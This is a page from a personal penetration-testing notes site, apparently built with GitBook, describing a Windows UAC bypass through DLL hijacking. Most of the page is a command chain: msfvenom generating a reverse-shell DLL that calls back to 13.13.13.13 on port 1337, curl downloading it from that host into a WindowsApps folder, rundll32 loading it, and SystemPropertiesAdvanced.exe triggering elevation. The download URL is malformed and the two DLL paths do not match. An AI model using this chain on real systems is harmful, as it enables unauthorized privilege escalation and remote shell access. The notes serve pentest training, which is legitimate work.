RIO
  • Welcome
    • RIO
    • Useful Links
  • PENTESTING
    • Methodology
    • Protocols
      • FTP
      • SMB
      • NFS
      • SSH
      • RDP
      • SMTP
      • IMAP / POP3
      • RSYNC
      • SNMP
      • IPMI
      • R-Services
      • WinRM
      • WMI
      • LDAP
    • Databases
      • MySQL
      • MSSQL
      • Oracle TNS
      • PostgreSQL
    • File Transfers
      • Windows
      • Linux
      • Code
      • Misc
    • Password Attacks
      • John The Ripper
      • Hashcat
    • Docker
  • TOOLS
    • Nmap
    • Metasploit
    • BloodHound
    • Other
  • Linux
    • Theory
    • Commands and Utilities
      • Useful Commands
    • Bash Scripting
    • Post-Exploitation
      • Cred Hunting
      • Pivoting
    • Privilege Escalation
  • WINDOWS
    • Theory
      • Security
    • Commands and Utilities
    • PowerShell
    • Post-Exploitation
      • Tools
      • Enumeration
        • System
        • Network
        • Users
        • Groups
        • Processes / Services
        • Permissions
        • Defence
        • Programs
        • Files
      • Access
      • Pivoting
      • Cred Hunting
    • Privilege Escalation
      • Privileges
      • Built-In Groups
        • Backup Operators
        • Server Operators
        • Print Operators
        • DnsAdmins
        • Event Log Readers
      • Privilege Abuse
        • Potatoes
        • SeDebugPrivilege
        • SeTakeOwnershipPrivilege
      • MISC
        • UAC Bypass
        • User-Interaction Attacks
        • Weak Permissions
  • ACTIVE DIRECTORY
    • Theory
      • Terminology
    • Reconnaissance
      • Responder
      • Password Policies
      • DNS
      • Enumeration
        • Users
        • Groups
          • GPO's
        • Shares
        • Domain
        • Trusts
        • ACL
    • Movement
      • Credentials
        • Dumping
          • DCSync
        • Making a Target List
        • Spraying
        • Powershell Remoting
      • Kerberos
        • Kerbrute
        • Kerberoasting
          • Semi-Manual Way
          • Targeted Kerberoasting
        • ASREProasting
        • Forging
          • Golden Ticket
        • Overpass The Hash
        • Pass The Ticket
        • noPAC
      • MITM / Coerced Auths
        • LLMNR, NBT-NS Poisoning
        • PetitPotam
      • DACL Abuse
        • AddMember
        • ForceChangePassword
      • Trust Abuse
        • ExtraSIDs
      • ADCS
      • Printers
        • PrintNightmare
    • Tools
  • Networking
    • Theory
      • Types / Topologies
      • OSI & TCP/IP Models
      • TCP / UDP
      • MAC Addresses
      • IP / Subnetting
      • Proxies
      • ARP
    • Pivoting
      • Port-Forwarding
    • Commands and Utilities
    • Techniques
  • WEB
    • Web Recon
      • Fuzzing
    • DNS
  • CLOUD
    • Google GKE/GCP
      • Theory
Powered by GitBook
On this page
  • About
  • UAC Bypass with DLL Hijacking
  1. WINDOWS
  2. Privilege Escalation
  3. MISC

UAC Bypass

PreviousMISCNextUser-Interaction Attacks

About

More about UAC in theory you can read here [LINK]

Here you would be looking more into UAC Bypasses, because every account. even elevated one have two types of tokens, low and high privilege. And sometimes after we got some high-privilege user we need to bypass UAC to actually use high-privilege token. Here I would write about UAC techniques I used during machines or engagements.

Very useful is UACME repository

Also this repo is useful

UAC Bypass with DLL Hijacking

Review Path Variable

PS C:/> cmd /c echo %PATH%

Generate Malicious DLL

msfvenom -p windows/shell_reverse_tcp LHOST=13.13.13.13 LPORT=1337 -f dll > srrstr.dll

Download DLL

curl http:/13.13.13.13:1337/srrstr.dll -O "C:\Users\ven17\AppData\Local\Microsoft\Windows Apps\srrstr.dll"

Execute Malicious DLL on Target

rundll32 shell32.dll,Control_RunDLL C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Ensure No Existing rundll32 Instances

tasklist /svc | findstr "rundll32"
taskkill /PID <PID> /F

Execute SystemPropertiesAdvanced.exe for UAC Bypass

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Verify Elevated Privileges

whoami /priv
[LINK]
[LINK]